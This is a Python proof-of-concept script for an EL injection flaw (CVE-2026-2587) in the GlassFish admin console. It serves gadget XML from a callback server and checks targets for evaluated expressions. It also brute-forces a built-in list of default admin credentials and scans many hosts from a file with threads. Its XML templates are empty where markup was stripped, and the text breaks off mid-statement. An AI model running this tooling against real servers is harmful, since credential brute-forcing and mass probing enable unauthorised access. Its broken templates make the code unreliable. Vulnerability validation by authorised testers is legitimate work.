#!/usr/bin/env python3 """ CVE-2026-2587 — GlassFish EL Injection Validator GHSA: GHSA-29wv-cv7p-xjc2 | CVSS 9.6 Critical | CWE-917 CONFIRMED BEHAVIOUR (live-tested on GlassFish 7.0.15) ─────────────────────────────────────────────────────── ✅ EL evaluated in : ✅ EL evaluated in : ❌ NOT evaluated in: ← CDATA blocks EL AUTH ──── Direct request → FORM auth (200 login page not 302) Real attack → CSRF against logged-in admin (PR:N / UI:R) Validation → --cookie "JSESSIONID=..." is most reliable USAGE — SINGLE TARGET ───────────────────── python3 CVE-2026-2587-Exploit-POC.py \ --base https://localhost:4848 \ --listen 0.0.0.0:8000 \ --callback-url http://host.docker.internal:8000 \ --cookie "JSESSIONID=abc123" --insecure python3 CVE-2026-2587-Exploit-POC.py \ --base https://localhost:4848 \ --listen 0.0.0.0:8000 \ --callback-url http://host.docker.internal:8000 \ --username admin --password admin --insecure python3 CVE-2026-2587-Exploit-POC.py \ --base https://localhost:4848 \ --listen 0.0.0.0:8000 \ --callback-url http://host.docker.internal:8000 \ --brute --insecure USAGE — MULTIPLE TARGETS ───────────────────────── # targets.txt — one URL per line, optional per-target creds: # https://server1:4848 # https://server2:4848 admin password123 # https://server3:4848 ops secret python3 CVE-2026-2587-Exploit-POC.py \ --targets-file targets.txt \ --listen 0.0.0.0:8000 \ --callback-url https://abc123.ngrok-free.app \ --username admin --password admin \ --threads 5 --insecure \ --csv results.csv USAGE — OUTPUT FORMATS ─────────────────────── --json JSON report to stdout --csv FILE CSV report written to FILE --csv - CSV to stdout USAGE — PROXY / HEADERS ──────────────────────── --proxy http://127.0.0.1:8080 (Burp/ZAP) --header "X-Forwarded-For: 1.2.3.4" (repeatable) USE ONLY ON SYSTEMS YOU OWN OR ARE AUTHORISED TO TEST. """ from __future__ import annotations import argparse import contextlib import csv import html import http.server import io import json import random import re import socketserver import sys import threading import time import warnings from concurrent.futures import ThreadPoolExecutor, as_completed from dataclasses import dataclass from datetime import datetime, timezone from typing import Any, Optional from urllib.parse import quote, urlparse try: import requests from urllib3.exceptions import InsecureRequestWarning except ImportError: sys.exit("[!] pip install requests") try: from colorama import Fore, Style, init as _ci; _ci() G = Fore.GREEN; R = Fore.RED; Y = Fore.YELLOW; B = Fore.CYAN; RESET = Style.RESET_ALL except ImportError: G = R = Y = B = RESET = "" def _ok(s): return f"{G}[+] {s}{RESET}" def _fail(s): return f"{R}[-] {s}{RESET}" def _warn(s): return f"{Y}[!] {s}{RESET}" def _inf(s): return f" {s}" def _hdr(s): return f"{B}{s}{RESET}" # ══════════════════════════════════════════════════════════════════════════════ # BRUTE-FORCE CREDENTIAL LIST # Common GlassFish default / vendor credentials tried when --brute is given. # ══════════════════════════════════════════════════════════════════════════════ BRUTE_CREDS: list[tuple[str, str]] = [ ("admin", "admin"), ("admin", ""), ("admin", "adminadmin"), ("admin", "password"), ("admin", "admin123"), ("admin", "Admin1234"), ("admin", "glassfish"), ("admin", "glassfishadmin"), ("admin", "changeit"), ("admin", "changeme"), ("admin", "secret"), ("admin", "welcome1"), ("admin", "oracle"), ("admin", "Oracle123"), ("administrator", "administrator"), ("administrator", "password"), ("administrator", "admin"), ("glassfish", "glassfish"), ("root", "root"), ("root", "password"), ("root", "toor"), ] # ══════════════════════════════════════════════════════════════════════════════ # CANARY — single arithmetic probe (for Phase 1 + static --xml-url mode) # ══════════════════════════════════════════════════════════════════════════════ @dataclass(frozen=True) class Canary: prefix: str left: int right: int @property def expr(self) -> str: return f"#{{{self.left}*{self.right}}}" @property def value(self) -> str: return str(self.left * self.right) @property def title_raw(self) -> str: return f"{self.prefix}_TITLE_{self.expr}_END" @property def title_eval(self) -> str: return f"{self.prefix}_TITLE_{self.value}_END" @property def body_raw(self) -> str: return f"{self.prefix}_BODY_{self.expr}_END" @property def body_eval(self) -> str: return f"{self.prefix}_BODY_{self.value}_END" def xml(self) -> bytes: return f""" {self.body_raw}]]> """.encode() def as_dict(self) -> dict: return { "expression": self.expr, "expected_value": self.value, "title_raw": self.title_raw, "title_eval": self.title_eval, "body_raw": self.body_raw, "body_eval": self.body_eval, } # ══════════════════════════════════════════════════════════════════════════════ # TEST CASES — 10 distinct EL probes, each served at its own path # ══════════════════════════════════════════════════════════════════════════════ @dataclass class TestCase: name: str description: str path: str el_expr: str expected: str def build_test_cases(tag: int) -> list[TestCase]: return [ TestCase("TC-01 Basic multiply", "#{7*7} → 49", "/tc01.xml", "7*7", "49"), TestCase("TC-02 Addition", "#{1337+2587} → 3924", "/tc02.xml", "1337+2587", "3924"), TestCase("TC-03 Large multiply", "#{31337*271} → 8492327", "/tc03.xml", "31337*271", "8492327"), TestCase("TC-04 Subtraction", "#{9999-1337} → 8662", "/tc04.xml", "9999-1337", "8662"), TestCase("TC-05 Nested arithmetic", "#{(6+1)*(6+1)} → 49", "/tc05.xml", "(6+1)*(6+1)", "49"), TestCase("TC-06 Ternary conditional", "#{1==1?'VULN':'SAFE'} → VULN", "/tc06.xml", "1==1?'VULN':'SAFE'", "VULN"), TestCase("TC-07 String concat", "#{'CVE'.concat('2026')} → CVE2026", "/tc07.xml", "'CVE'.concat('2026')", "CVE2026"), TestCase("TC-08 Chained concat", "#{'GL'.concat('ASS').concat('FISH')} → GLASSFISH", "/tc08.xml", "'GL'.concat('ASS').concat('FISH')", "GLASSFISH"), TestCase("TC-09 Modulo", "#{17 mod 5} → 2", "/tc09.xml", "17 mod 5", "2"), TestCase("TC-10 Large addition", "#{100*100} → 10000", "/tc10.xml", "100*100", "10000"), ] def make_tc_xml(tc: TestCase, tag: int) -> tuple[bytes, str, str]: """Returns (xml_bytes, detect_token, raw_prefix).""" marker = f"PROBE{tag}" detect = f"{marker}_{tc.expected}_END" raw = f"{marker}_#" xml = ( f'\n' f'\n' f' \n' f' \n' f'\n' ).encode() if tc.path == "/tc09.xml": detect = f"{marker}_2" # mod may render 2 or 2.0 return xml, detect, raw # ══════════════════════════════════════════════════════════════════════════════ # SHARED XML SERVER # One server, shared across all target threads. # ══════════════════════════════════════════════════════════════════════════════ class _State: routes: dict[str, bytes] = {} hits: dict[str, int] = {} lock: threading.Lock = threading.Lock() verbose: bool = False class _Handler(http.server.BaseHTTPRequestHandler): def log_message(self, fmt: str, *args: object) -> None: if _State.verbose: super().log_message(fmt, *args) def do_GET(self) -> None: path = self.path.split("?")[0] with _State.lock: _State.hits[path] = _State.hits.get(path, 0) + 1 body = _State.routes.get(path, b"") if not body: self.send_response(404); self.end_headers(); return self.send_response(200) self.send_header("Content-Type", "application/xml; charset=utf-8") self.send_header("Content-Length", str(len(body))) self.end_headers() self.wfile.write(body) class _Server(socketserver.ThreadingMixIn, http.server.HTTPServer): daemon_threads = True allow_reuse_address = True @contextlib.contextmanager def xml_server(listen: str, verbose: bool): if ":" not in listen: raise ValueError("--listen must be host:port e.g. 0.0.0.0:8000") host, port_s = listen.rsplit(":", 1) _State.routes = {} _State.hits = {} _State.verbose = verbose srv = _Server((host, int(port_s)), _Handler) threading.Thread(target=srv.serve_forever, daemon=True).start() try: yield finally: srv.shutdown() srv.server_close() # ══════════════════════════════════════════════════════════════════════════════ # AUTH HELPERS # ══════════════════════════════════════════════════════════════════════════════ def _norm(u: str) -> str: u = u.strip().rstrip("/") return u if u.startswith(("http://", "https://")) else "http://" + u def _context_root(ep: str) -> str: path = urlparse(ep).path marker = "/common/gadgets/gadget.jsf" return path.split(marker)[0] if marker in path else "" def _url(ep: str, suffix: str) -> str: p = urlparse(ep) return f"{p.scheme}://{p.netloc}{_context_root(ep)}{suffix}" def looks_like_login(resp: requests.Response) -> bool: text = (resp.text or "").lower() url = resp.url.lower() return ( "login.jsf" in url or "j_security_check" in url or "j_username" in text or "j_password" in text or ("glassfish administration console" in text and "login" in text) ) def make_session(args: argparse.Namespace, username: Optional[str] = None, password: Optional[str] = None, cookie: Optional[str] = None) -> requests.Session: """Build a requests.Session with auth, headers, proxy.""" s = requests.Session() s.headers["User-Agent"] = "cve-2026-2587-validator/3.0" ck = cookie or args.cookie if ck: s.headers["Cookie"] = ck if args.header: for h in args.header: if ":" not in h: raise ValueError(f"Invalid --header {h!r}") k, v = h.split(":", 1) s.headers[k.strip()] = v.strip() if args.proxy: s.proxies.update({"http": args.proxy, "https": args.proxy}) return s def try_login(session: requests.Session, ep: str, username: str, password: str, timeout: int, verify: bool, verbose: bool) -> bool: """ GlassFish form login. Always uses the root j_security_check — never derived from a context root like /asadmin because that path does not exist. Flow: 1. GET /login.jsf → seeds JSESSIONID in session cookie jar 2. POST /j_security_check → submits credentials 3. GET /common/index.jsf → confirms session is authenticated """ p = urlparse(ep) root = f"{p.scheme}://{p.netloc}" login = f"{root}/login.jsf" action = f"{root}/j_security_check" console = f"{root}/common/index.jsf" try: # Step 1 — seed session cookie session.get(login, timeout=timeout, verify=verify, allow_redirects=True) # Step 2 — submit credentials r = session.post( action, data={"j_username": username, "j_password": password}, timeout=timeout, verify=verify, allow_redirects=True, ) except requests.RequestException as e: if verbose: print(_warn(f"Login request error: {e}")) return False final = r.url.rstrip("/") if verbose: print(_inf(f"Login POST final URL: {final}")) if "j_security_check" in final: if verbose: print(_warn(f"Credentials rejected by GlassFish (final URL: {final})")) return False # Step 3 — confirm session reaches the console try: v = session.get(console, timeout=timeout, verify=verify, allow_redirects=True) if looks_like_login(v): if verbose: print(_warn("POST succeeded but console still requires auth")) return False except requests.RequestException: pass # network hiccup — trust the POST result if verbose: print(_ok(f"Login confirmed — session active")) return True def brute_force_login( args: argparse.Namespace, eps: list[str], xml_url: str, verify: bool, verbose: bool, ) -> tuple[Optional[requests.Session], Optional[str], Optional[str]]: """ Try each entry in BRUTE_CREDS in order. Verification strategy: 1. Seed JSESSIONID via GET /login.jsf 2. POST credentials to /j_security_check 3. Reject only if the POST remains on j_security_check 4. Confirm with the gadget endpoint body. Some GlassFish builds redirect valid form logins back to login.jsf, so the POST final URL alone is not enough to reject a credential pair. Returns (session, username, password) on first success, (None, None, None) otherwise. """ if not eps: return None, None, None p = urlparse(eps[0]) root = f"{p.scheme}://{p.netloc}" login_url = f"{root}/login.jsf" action_url = f"{root}/j_security_check" for username, password in BRUTE_CREDS: session = make_session(args) if verbose: pw_display = repr(password) if password else "(empty)" print(_inf(f" Trying {username!r} / {pw_display!r}")) try: session.get(login_url, timeout=args.timeout, verify=verify, allow_redirects=True) r = session.post( action_url, data={"j_username": username, "j_password": password}, timeout=args.timeout, verify=verify, allow_redirects=True, ) except requests.RequestException as exc: if verbose: print(_warn(f" Request error: {exc}")) continue # Wrong credentials can remain on j_security_check. A final login.jsf # URL is not decisive on GlassFish 7.0.15; valid sessions can land # there and still authenticate subsequent admin-console requests. final = r.url.lower().rstrip("/") if "j_security_check" in final: continue # Confirm by probing the gadget endpoint. Invalid sessions receive the # login form here; valid sessions reach the gadget handler even if the # XML callback later fails. for ep in eps: try: check = do_get(session, ep, xml_url, args.timeout, verify) except requests.RequestException: continue if check is None: continue if check.status_code in (401, 403): break if not looks_like_login(check): if verbose: print(_ok(f" Confirmed: {username!r} / {repr(password) if password else '(empty)'}")) return session, username, password return None, None, None # ══════════════════════════════════════════════════════════════════════════════ # VERSION DETECTION # Admin console URL structure is identical across GlassFish 3.x–8.x so paths # never change. Version detection is used purely for reporting and triage. # ══════════════════════════════════════════════════════════════════════════════ # Public advisories currently list affected and patched versions as unknown. # Keep version data as reporting context only; proof decides the verdict. _VER_RE = re.compile( r"(?:Eclipse\s+GlassFish|GlassFish(?:\s+Server)?(?:\s+Open\s+Source\s+Edition)?)" r"\s+(\d+)\.(\d+)(?:\.(\d+))?", re.IGNORECASE, ) def _parse_version(text: str) -> Optional[tuple[int, int, int]]: m = _VER_RE.search(text) if m: return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0) return None def is_affected(major: int, minor: int, patch: int) -> Optional[bool]: """Return advisory affected status when a version boundary is published.""" return None def detect_glassfish_version( root: str, session: requests.Session, timeout: int, verify: bool, ) -> dict[str, Any]: """ Fingerprint GlassFish version via four methods in order: 1. Server / X-Powered-By response headers (any endpoint, cheapest) 2. REST management API /management/domain (JSON, no auth needed) 3. Admin login page body text 4. /__asadmin/version.json (exact version; needs auth, skip on 401/403) Also discovers the GUI context-root from redirect Location headers so resolve_endpoints() can try non-default prefixes (/admin, /console, …). Returns dict: version_string, major, minor, patch, source, affected, context_root_hint """ empty: dict[str, Any] = { "version_string": "", "major": 0, "minor": 0, "patch": 0, "source": "", "affected": None, "context_root_hint": "", } context_root_hint = "" def _make(triple: tuple[int, int, int], src: str, raw: str) -> dict[str, Any]: maj, min_, pat = triple return { "version_string": raw, "major": maj, "minor": min_, "patch": pat, "source": src, "affected": is_affected(maj, min_, pat), "context_root_hint": context_root_hint, } def _learn_context_root(location: str) -> None: """Parse redirect Location to learn a non-default GUI context root.""" nonlocal context_root_hint if not location or context_root_hint: return # e.g. Location: /admin/login.jsf → root hint = "/admin" m = re.match(r"^(/[^/]+)/(?:login\.jsf|common/)", location) if m and m.group(1) not in ("/common", "/asadmin"): context_root_hint = m.group(1) # 1. Headers — try cheap endpoints; capture redirect hints along the way for path in ("/", "/login.jsf", "/common/index.jsf"): try: r = session.get(root + path, timeout=timeout, verify=verify, allow_redirects=False) _learn_context_root(r.headers.get("Location", "")) # Follow manually to get the final response headers too if r.status_code in (301, 302, 303, 307, 308): loc = r.headers.get("Location", "") if loc: target_url = loc if loc.startswith("http") else root + loc r = session.get(target_url, timeout=timeout, verify=verify, allow_redirects=True) except requests.RequestException: continue for hdr in ("Server", "X-Powered-By"): val = r.headers.get(hdr, "") if val: t = _parse_version(val) if t: return _make(t, f"header:{hdr}", val.strip()) # 2. REST management API for mgmt in (root + "/management/domain", root + "/management/domain.json"): try: r = session.get(mgmt, timeout=timeout, verify=verify, allow_redirects=True, headers={"Accept": "application/json"}) if r.status_code != 200: continue try: data = r.json() extra = data.get("extraProperties", {}) for key in ("GlassFish-version", "version-number", "version"): val = extra.get(key, "") if val: t = _parse_version(val) if t: return _make(t, "rest-api", val.strip()) except (ValueError, AttributeError): pass t = _parse_version(r.text) if t: m = _VER_RE.search(r.text) return _make(t, "rest-api", m.group(0).strip() if m else "") except requests.RequestException: continue # 3. Login page body try: r = session.get(root + "/login.jsf", timeout=timeout, verify=verify, allow_redirects=True) t = _parse_version(r.text) if t: m = _VER_RE.search(r.text) return _make(t, "login-page", m.group(0).strip() if m else "") except requests.RequestException: pass # 4. /__asadmin/version.json — exact version, usually auth-required; # works when called with an authenticated session after login. for ver_path in ("/__asadmin/version.json", "/__asadmin/version"): try: r = session.get(root + ver_path, timeout=timeout, verify=verify, allow_redirects=False) if r.status_code in (401, 403): continue # needs auth — skip silently if r.status_code == 200: t = _parse_version(r.text) if t: m = _VER_RE.search(r.text) return _make(t, "asadmin-api", m.group(0).strip() if m else "") except requests.RequestException: continue return {**empty, "context_root_hint": context_root_hint} # ══════════════════════════════════════════════════════════════════════════════ # ENDPOINT RESOLUTION # URL structure is consistent across GlassFish 3.x–8.x. # ══════════════════════════════════════════════════════════════════════════════ GADGET_PATHS = [ "/common/gadgets/gadget.jsf", "/admin/common/gadgets/gadget.jsf", "/console/common/gadgets/gadget.jsf", "/glassfish/common/gadgets/gadget.jsf", "/asadmin/common/gadgets/gadget.jsf", ] def resolve_endpoints(base: str, paths: Optional[list[str]], context_root_hint: str = "") -> list[str]: base = _norm(base) parsed = urlparse(base) root = f"{parsed.scheme}://{parsed.netloc}" if paths: cands = [p if p.startswith("/") else "/" + p for p in paths] else: cands = [] # Prepend hint-derived paths (learned from redirect Location headers) if context_root_hint: cands += [context_root_hint + gp for gp in GADGET_PATHS] if parsed.path and parsed.path != "/": cands += [parsed.path.rstrip("/") + gp for gp in GADGET_PATHS] cands += list(GADGET_PATHS) seen, out = set(), [] for p in cands: url = root + p if url not in seen: seen.add(url); out.append(url) return out # ══════════════════════════════════════════════════════════════════════════════ # CLASSIFICATION # ══════════════════════════════════════════════════════════════════════════════ def classify_canary(resp: requests.Response, canary: Canary) -> dict[str, Any]: body = resp.text or "" ev = { "title_evaluated": canary.title_eval in body, "body_evaluated": canary.body_eval in body, "title_raw_seen": canary.title_raw in body, "body_raw_seen": canary.body_raw in body, "expression_seen": canary.expr in body, } base = { "http_status": resp.status_code, "final_url": resp.url, "server": resp.headers.get("Server", ""), "x_powered_by": resp.headers.get("X-Powered-By", ""), "evidence": ev, } if resp.status_code in (401, 403) or looks_like_login(resp): return {**base, "status": "AUTH_REQUIRED", "detail": "Endpoint protected or redirected to login."} if ev["title_evaluated"] or ev["body_evaluated"]: detail = ("EL evaluated in title= only (CDATA not evaluated — expected)." if ev["title_evaluated"] and not ev["body_evaluated"] else "EL evaluated in body." if ev["body_evaluated"] and not ev["title_evaluated"] else "EL evaluated in both title and body.") return {**base, "status": "VULNERABLE", "detail": detail} if resp.status_code >= 500: detail = "Server 5xx — do not classify as patched." error_summary = summarize_server_error(body) if error_summary: detail = f"{detail} {error_summary}" return {**base, "status": "INCONCLUSIVE", "detail": detail, "body_sample": body[:400].replace("\n", " ")} if ev["title_raw_seen"] or ev["body_raw_seen"] or ev["expression_seen"]: return {**base, "status": "NOT_VULNERABLE_OR_ESCAPED", "detail": "Canary reflected literally — EL not evaluated."} return {**base, "status": "INCONCLUSIVE", "detail": "No canary found in response.", "body_sample": body[:400].replace("\n", " ")} def summarize_server_error(body: str) -> str: text = html.unescape(re.sub(r"<[^>]+>", " ", body or "")) text = re.sub(r"\s+", " ", text).strip() snippets = [] failed_open = re.search(r"Failed to open\s+\S+", text) if failed_open: snippets.append(failed_open.group(0)) if "PKIX path building failed" in text or "SSLHandshakeException" in text: snippets.append("JVM TLS trust failure (PKIX path building failed)") return " | ".join(snippets) def classify_tc(resp: requests.Response, detect_token: str, raw_prefix: str) -> str: if resp.status_code in (401, 403) or looks_like_login(resp): return "AUTH_REQUIRED" body = resp.text or "" if detect_token in body: return "VULNERABLE" if raw_prefix in body: return "NOT_VULNERABLE" return "INCONCLUSIVE" def do_get(session: requests.Session, endpoint: str, xml_url: str, timeout: int, verify: bool) -> Optional[requests.Response]: sep = "&" if "?" in endpoint else "?" try: return session.get(endpoint + sep + "gadget=" + quote(xml_url, safe=""), timeout=timeout, verify=verify, allow_redirects=True) except requests.RequestException: return None def normalize_callback_base(callback_url: str) -> tuple[str, Optional[str]]: """Return scheme://host[:port], with a Cloudflare quick-tunnel safety fix.""" parsed = urlparse(callback_url) scheme = parsed.scheme host = parsed.netloc warning = None if scheme == "https" and host.endswith(".trycloudflare.com"): scheme = "http" warning = ( f"trycloudflare HTTPS callback detected; using http://{host} so " "GlassFish JVMs without Cloudflare TLS trust can fetch the XML." ) return f"{scheme}://{host}", warning # ══════════════════════════════════════════════════════════════════════════════ # TARGETS FILE PARSER # Format per line (comments with # supported): # https://server:4848 # https://server:4848 admin password # https://server:4848 admin:password # ══════════════════════════════════════════════════════════════════════════════ @dataclass class Target: base: str username: Optional[str] = None password: Optional[str] = None cookie: Optional[str] = None def load_targets_file(path: str) -> list[Target]: targets = [] with open(path) as f: for raw in f: line = raw.strip() if not line or line.startswith("#"): continue parts = line.split() base = parts[0] username = password = None if len(parts) == 2: # user:pass or just cookie=value if ":" in parts[1] and not parts[1].startswith("http"): username, password = parts[1].split(":", 1) else: username = parts[1] elif len(parts) >= 3: username, password = parts[1], parts[2] targets.append(Target(base=base, username=username, password=password)) return targets # ══════════════════════════════════════════════════════════════════════════════ # SINGLE-TARGET SCAN # Returns a structured result dict for this target. # ══════════════════════════════════════════════════════════════════════════════ def scan_one( target: Target, args: argparse.Namespace, verify: bool, canary: Canary, xml_url: str, # canary XML URL (for Phase 1 + verification) cb_base: str, # callback base URL (for per-TC paths) test_cases: list[TestCase], tc_built: list[tuple], serve_mode: bool, static_mode: bool, verbose: bool, print_lock: threading.Lock, ) -> dict[str, Any]: ts = datetime.now(timezone.utc).isoformat() username = target.username or args.username password = target.password or args.password cookie = target.cookie or args.cookie result: dict[str, Any] = { "target": target.base, "timestamp": ts, "verdict": "ERROR", "unauth_result": "UNKNOWN", "active_endpoint": None, "server_header": "", "detected_version": "", "version_source": "", "version_affected": "", "admin_console": "unknown", "gadget_endpoint": "unknown", "proof": "not_attempted", "vulnerable_count": 0, "total_tests": len(test_cases), "tc_results": [], "brute_creds": None, "tested_paths": [], "error": None, } def _log(*msgs): if verbose: with print_lock: for m in msgs: print(m) # ── Version detection (run before eps resolution to learn context_root_hint) _det_session = make_session(args) _parsed = urlparse(_norm(target.base)) _root = f"{_parsed.scheme}://{_parsed.netloc}" ver_info = detect_glassfish_version(_root, _det_session, args.timeout, verify) if ver_info["version_string"]: result["detected_version"] = ver_info["version_string"] result["version_source"] = ver_info["source"] result["version_affected"] = ("YES" if ver_info["affected"] is True else "NO" if ver_info["affected"] is False else "UNKNOWN") _log(_inf( f"[{target.base}] Version: {ver_info['version_string']}" f" (via {ver_info['source']})" f" affected={result['version_affected']}" )) else: result["version_affected"] = "UNKNOWN" _log(_inf(f"[{target.base}] Version: could not detect — trying all endpoints")) # ── Endpoint resolution (uses context_root_hint from version detection) eps = resolve_endpoints(target.base, args.path, ver_info.get("context_root_hint", "")) # ── Phase 1: unauthenticated ───────────────────────────────────────────── unauth = make_session(args) # no cookie if cookie: unauth.headers.pop("Cookie", None) # strip for unauth probe for ep in eps: result["tested_paths"].append(ep) resp = do_get(unauth, ep, xml_url, args.timeout, verify) if resp is None: result["unauth_result"] = "ERROR"; continue r = classify_canary(resp, canary) result["unauth_result"] = r["status"] result["server_header"] = r.get("server", "") if r["status"] == "AUTH_REQUIRED": result["admin_console"] = "present" result["gadget_endpoint"] = "blocked" elif r["status"] in ("VULNERABLE", "NOT_VULNERABLE_OR_ESCAPED", "INCONCLUSIVE"): result["admin_console"] = "present" result["gadget_endpoint"] = "present" if r["status"] == "VULNERABLE": result["verdict"] = "VULNERABLE_UNAUTH" result["proof"] = "evaluated" _log(_ok(f"[{target.base}] VULNERABLE WITHOUT AUTH — {ep}")) return result if r["status"] in ("AUTH_REQUIRED", "NOT_VULNERABLE_OR_ESCAPED"): break if args.check_unauth_only: result["verdict"] = result["unauth_result"] return result # ── Phase 2: auth ──────────────────────────────────────────────────────── brute_mode = getattr(args, "brute", False) if not username and not cookie and not brute_mode: result["verdict"] = "AUTH_REQUIRED" result["error"] = "No credentials supplied for this target." _log(_warn(f"[{target.base}] No credentials — skipping authenticated scan.")) return result login_ep = eps[0] if eps else target.base if brute_mode: _log(_inf(f"[{target.base}] Brute-forcing {len(BRUTE_CREDS)} credential pairs ...")) session, found_user, found_pass = brute_force_login(args, eps, xml_url, verify, verbose) if session is None: result["verdict"] = "AUTH_REQUIRED" result["error"] = f"Brute force exhausted {len(BRUTE_CREDS)} credential pairs — none succeeded." _log(_warn(f"[{target.base}] Brute force failed — no valid credentials found.")) return result display_pass = found_pass if found_pass else "(empty)" result["brute_creds"] = f"{found_user}:{display_pass}" _log(_ok(f"[{target.base}] Brute force success — {found_user!r} / {display_pass!r}")) else: session = make_session(args, username=username, password=password, cookie=cookie) if username and not cookie: _log(_inf(f"[{target.base}] Logging in as '{username}' ...")) # Always login against the base URL root — never against /asadmin/ or # any derived context root since /asadmin/j_security_check does not exist. logged_in = try_login(session, login_ep, username, password or "", args.timeout, verify, verbose) if logged_in: _log(_ok(f"[{target.base}] Login verified.")) else: _log(_warn(f"[{target.base}] Form login failed — trying endpoint anyway.")) _log(_inf(f"[{target.base}] If this keeps failing, use --cookie instead.")) # Verify session reaches endpoint active_ep = None for ep in eps: if ep not in result["tested_paths"]: result["tested_paths"].append(ep) resp = do_get(session, ep, xml_url, args.timeout, verify) if resp is not None and not looks_like_login(resp): active_ep = ep result["gadget_endpoint"] = "present" if not result["server_header"]: result["server_header"] = resp.headers.get("Server", "") _log(_ok(f"[{target.base}] Session valid — {ep}")) break elif resp is not None and resp.status_code in (401, 403): result["gadget_endpoint"] = "blocked" if not active_ep: result["verdict"] = "AUTH_REQUIRED" result["error"] = "All endpoints returned login page. Cookie may be expired." _log(_warn(f"[{target.base}] Auth failed — cookie expired or wrong password.")) return result result["active_endpoint"] = active_ep # ── Post-auth version re-probe via /__asadmin/version.json ────────────── if not ver_info["version_string"] or ver_info["source"] != "asadmin-api": for _vpath in ("/__asadmin/version.json", "/__asadmin/version"): try: _vr = session.get(_root + _vpath, timeout=args.timeout, verify=verify, allow_redirects=False) if _vr.status_code == 200: _vt = _parse_version(_vr.text) if _vt: _vm = _VER_RE.search(_vr.text) _maj, _min, _pat = _vt result["detected_version"] = _vm.group(0).strip() if _vm else f"{_maj}.{_min}.{_pat}" result["version_source"] = "asadmin-api" _affected = is_affected(_maj, _min, _pat) result["version_affected"] = ("YES" if _affected is True else "NO" if _affected is False else "UNKNOWN") _log(_inf(f"[{target.base}] Post-auth version: {result['detected_version']}" f" (affected={result['version_affected']})")) break except requests.RequestException: continue # ── Phase 3: test cases ───────────────────────────────────────────────── if static_mode or not serve_mode: resp = do_get(session, active_ep, xml_url, args.timeout, verify) if resp is None: result["verdict"] = "ERROR" result["error"] = "Request failed" return result r = classify_canary(resp, canary) result["verdict"] = r["status"] result["vulnerable_count"] = 1 if r["status"] == "VULNERABLE" else 0 if r["status"] == "VULNERABLE": result["proof"] = "evaluated" elif r["status"] == "NOT_VULNERABLE_OR_ESCAPED": result["proof"] = "not_evaluated" if r["status"] in ("INCONCLUSIVE", "AUTH_REQUIRED"): result["error"] = r.get("detail") result["tc_results"] = [{ "name": "single-canary", "expr": canary.expr, "expects": canary.value, "status": r["status"], }] return result vuln_count = 0 tc_rows = [] for tc, _xml_bytes, detect_token, raw_prefix in tc_built: tc_xml_url = f"{cb_base.rstrip('/')}{tc.path}" resp = do_get(session, active_ep, tc_xml_url, args.timeout, verify) status = "ERROR" if resp is None else classify_tc(resp, detect_token, raw_prefix) if status == "VULNERABLE": vuln_count += 1 tc_rows.append({ "name": tc.name, "expr": f"#{{{tc.el_expr}}}", "expects": tc.expected, "status": status, }) result["vulnerable_count"] = vuln_count result["total_tests"] = len(test_cases) result["tc_results"] = tc_rows if vuln_count > 0: result["verdict"] = "VULNERABLE" result["proof"] = "evaluated" elif tc_rows and all(row["status"] == "NOT_VULNERABLE" for row in tc_rows): result["verdict"] = "NOT_VULNERABLE" result["proof"] = "not_evaluated" else: result["verdict"] = "INCONCLUSIVE" result["error"] = "No evaluated canaries found; one or more test cases were inconclusive." return result # ══════════════════════════════════════════════════════════════════════════════ # CSV OUTPUT # ══════════════════════════════════════════════════════════════════════════════ TC_NAMES = [ "TC-01 Basic multiply", "TC-02 Addition", "TC-03 Large multiply", "TC-04 Subtraction", "TC-05 Nested arithmetic", "TC-06 Ternary conditional", "TC-07 String concat", "TC-08 Chained concat", "TC-09 Modulo", "TC-10 Large addition", ] CSV_FIELDS = ( ["target", "timestamp", "verdict", "vulnerable_count", "total_tests", "unauth_exposed", "active_endpoint", "server_header", "detected_version", "version_source", "version_affected", "admin_console", "gadget_endpoint", "proof", "brute_creds"] + TC_NAMES + ["notes"] ) def results_to_csv_rows(results: list[dict]) -> list[dict]: rows = [] for r in results: tc_map = {t["name"]: t["status"] for t in r.get("tc_results", [])} row = { "target": r["target"], "timestamp": r["timestamp"], "verdict": r["verdict"], "vulnerable_count": r["vulnerable_count"], "total_tests": r["total_tests"], "unauth_exposed": "YES" if r.get("unauth_result") == "VULNERABLE" else "no", "active_endpoint": r.get("active_endpoint") or "", "server_header": r.get("server_header", ""), "detected_version": r.get("detected_version", ""), "version_source": r.get("version_source", ""), "version_affected": r.get("version_affected", "UNKNOWN"), "admin_console": r.get("admin_console", "unknown"), "gadget_endpoint": r.get("gadget_endpoint", "unknown"), "proof": r.get("proof", "not_attempted"), "brute_creds": r.get("brute_creds") or "", "notes": r.get("error") or "", } for tc_name in TC_NAMES: row[tc_name] = tc_map.get(tc_name, "SKIPPED") rows.append(row) return rows def write_csv(results: list[dict], dest: str) -> None: rows = results_to_csv_rows(results) if dest == "-": out = io.StringIO() w = csv.DictWriter(out, fieldnames=CSV_FIELDS, lineterminator="\n") w.writeheader() w.writerows(rows) print(out.getvalue()) else: with open(dest, "w", newline="", encoding="utf-8") as f: w = csv.DictWriter(f, fieldnames=CSV_FIELDS, lineterminator="\n") w.writeheader() w.writerows(rows) print(_ok(f"CSV written → {dest}")) # ══════════════════════════════════════════════════════════════════════════════ # CONSOLE PRINTER # ══════════════════════════════════════════════════════════════════════════════ def print_result(r: dict, verbose: bool) -> None: target = r["target"] verdict = r["verdict"] vuln = r["vulnerable_count"] total = r["total_tests"] print(f"\n{'─'*64}") print(f" Target : {target}") print(f" Server : {r.get('server_header','') or '(unknown)'}") ver = r.get("detected_version", "") ver_src = r.get("version_source", "") aff = r.get("version_affected", "UNKNOWN") if ver: aff_label = (f"{G}YES{RESET}" if aff == "YES" else f"{R}NO{RESET}" if aff == "NO" else f"{Y}UNKNOWN{RESET}") src_note = f" [{ver_src}]" if ver_src else "" print(f" Version : {ver}{src_note} (affected: {aff_label})") ac = r.get("admin_console", "unknown") ge = r.get("gadget_endpoint", "unknown") pr = r.get("proof", "not_attempted") if ac != "unknown" or ge != "unknown": print(f" Console : {ac} | Gadget: {ge} | Proof: {pr}") if verdict in ("VULNERABLE", "VULNERABLE_UNAUTH"): unauth_note = " (UNAUTHENTICATED)" if verdict == "VULNERABLE_UNAUTH" else "" print(_ok(f"VULNERABLE{unauth_note} — {vuln}/{total} test cases confirmed")) if r.get("brute_creds"): print(_ok(f" Credentials : {r['brute_creds']}")) for tc in r.get("tc_results", []): if tc["status"] == "VULNERABLE": print(_ok(f" {tc['name']} {tc['expr']} → {tc['expects']}")) elif verdict == "NOT_VULNERABLE": print(_fail(f"NOT VULNERABLE — 0/{total}")) elif 